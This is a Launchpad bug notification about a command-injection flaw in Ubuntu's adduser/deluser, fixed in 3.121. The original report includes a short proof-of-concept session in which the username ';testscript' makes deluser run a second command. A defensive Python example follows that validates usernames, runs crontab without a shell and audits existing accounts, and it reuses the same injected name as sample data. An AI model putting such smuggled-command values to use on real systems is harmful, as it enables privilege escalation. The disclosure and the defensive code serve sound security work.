[Bug 1838489] Re: adduser & deluser shell command injection
Benjamin Drung
1838489 at bugs.launchpad.net
Tue Aug 23 08:27:20 UTC 2022
It's fixed in Debian by version 3.121 and therefore fixed in adduser
3.121ubuntu1 in Ubuntu 22.10 (kinetic).
** Changed in: adduser (Ubuntu)
Status: Confirmed => Fix Released
--
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to adduser in Ubuntu.
https://bugs.launchpad.net/bugs/1838489
Title:
adduser & deluser shell command injection
Status in adduser package in Ubuntu:
Fix Released
Status in adduser package in Debian:
Fix Released
Bug description:
The deluser program is vulnerable to a command injection vulnerability
when a user is added via adduser with special characters (such as
';'). It is only possible when the user exists on the system (adduser
does not prevent usernames with ';' from being added.)
This can be a security risk when user accounts on the system can be
created from arbitrary input, and there are exploitable programs in
PATH to make privilege escalation possible.
-------------- Proof of concept ----------------
# ll /test-file
ls: cannot access '/test-file': No such file or directory
# cat /usr/bin/testscript
#!/bin/bash
touch /test-file
# deluser
Enter a user name to remove: ;testscript
no crontab for root
crontab: usage error: no arguments permitted after this option
usage: crontab [-u user] file
       crontab [ -u user ] [ -i ] { -e | -l | -r }
               (default operation is replace, per 1003.2)
       -e      (edit user's crontab)
       -l      (list user's crontab)
       -r      (delete user's crontab)
       -i      (prompt before deleting user's crontab)
/usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting.
(failed reverse-i-search)`': deluser^C
# ll /test-file
-rw------- 1 root root 0 Jul 31 10:25 /test-file
-------- system description --------
Description: Ubuntu 18.04.2 LTS
Release: 18.04
# apt-cache policy adduser
adduser:
Installed: 3.116ubuntu1
Candidate: 3.116ubuntu1
Version table:
*** 3.116ubuntu1 500
500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages
100 /var/lib/dpkg/status
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions
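The root cause described in the bug report is that a username was interpolated into a command line that a shell then parsed, so ';' in the name terminated the crontab command and started a new one. The following Python example is added here as an illustration of the defensive pattern; it is not code from adduser/deluser or from the bug report. It assumes a hypothetical username policy SAFE_USERNAME (modelled on the kind of NAME_REGEX check adduser.conf lets an administrator configure, not adduser's exact default), builds the crontab invocation as an argv list so no shell is ever involved, and includes an audit helper for finding already-existing accounts whose names would fail that policy, since the report notes the injection only works for names that are already on the system. The passwd lines at the bottom are constructed sample data.

```python
import re
import subprocess
from typing import Callable, List, Optional, Sequence

# Hypothetical username policy (assumption for this example): lowercase start,
# then lowercase letters, digits, '_' or '-', at most 32 characters in total.
# Shell metacharacters such as ';', '$', '`', '|' and whitespace cannot match.
SAFE_USERNAME = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


class UnsafeUsername(ValueError):
    """Raised for a name that fails SAFE_USERNAME; such a name never reaches a command."""


def validate_username(name: str) -> str:
    """Return name unchanged if it satisfies SAFE_USERNAME, otherwise raise."""
    if not SAFE_USERNAME.fullmatch(name):
        raise UnsafeUsername(f"rejected username {name!r}")
    return name


def crontab_removal_argv(name: str) -> List[str]:
    """Build the 'crontab -u <name> -r' invocation as an argv list.

    Each list element becomes exactly one argument of the executed program, so
    even a name containing ';' would be handed to crontab as a literal string
    rather than being parsed by /bin/sh as a command separator. The validation
    is kept as a second, independent layer.
    """
    return ["/usr/bin/crontab", "-u", validate_username(name), "-r"]


def _run_without_shell(argv: Sequence[str]) -> int:
    """Execute argv directly (shell=False is subprocess.run's default) and return its exit code."""
    return subprocess.run(list(argv), check=False).returncode


def remove_user_crontab(name: str, run: Optional[Callable[[Sequence[str]], int]] = None) -> int:
    """Remove a user's crontab safely; 'run' is injectable so the logic can be tested offline."""
    runner = run if run is not None else _run_without_shell
    return runner(crontab_removal_argv(name))


def find_unsafe_accounts(passwd_text: str) -> List[str]:
    """Return the usernames in /etc/passwd-style text that would fail SAFE_USERNAME.

    Useful as an audit step on systems where accounts may have been created from
    untrusted input before a fixed adduser was installed.
    """
    unsafe = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        username = line.split(":", 1)[0]
        if not SAFE_USERNAME.fullmatch(username):
            unsafe.append(username)
    return unsafe


# Constructed sample passwd content for demonstration; not taken from any real system.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
;testscript:x:1001:1001::/home/testscript:/bin/bash
bob-2:x:1002:1002::/home/bob-2:/bin/bash
"""

if __name__ == "__main__":
    print("accounts failing the policy:", find_unsafe_accounts(SAMPLE_PASSWD))
    print("argv for alice:", crontab_removal_argv("alice"))
    try:
        crontab_removal_argv(";testscript")
    except UnsafeUsername as exc:
        print("rejected:", exc)
```

The two layers are deliberately independent: the argv list alone already prevents shell interpretation, and the policy check alone already refuses the name, so a regression in either one does not reopen the issue. The audit helper gives an administrator a quick way to enumerate accounts that a stricter policy would never have allowed.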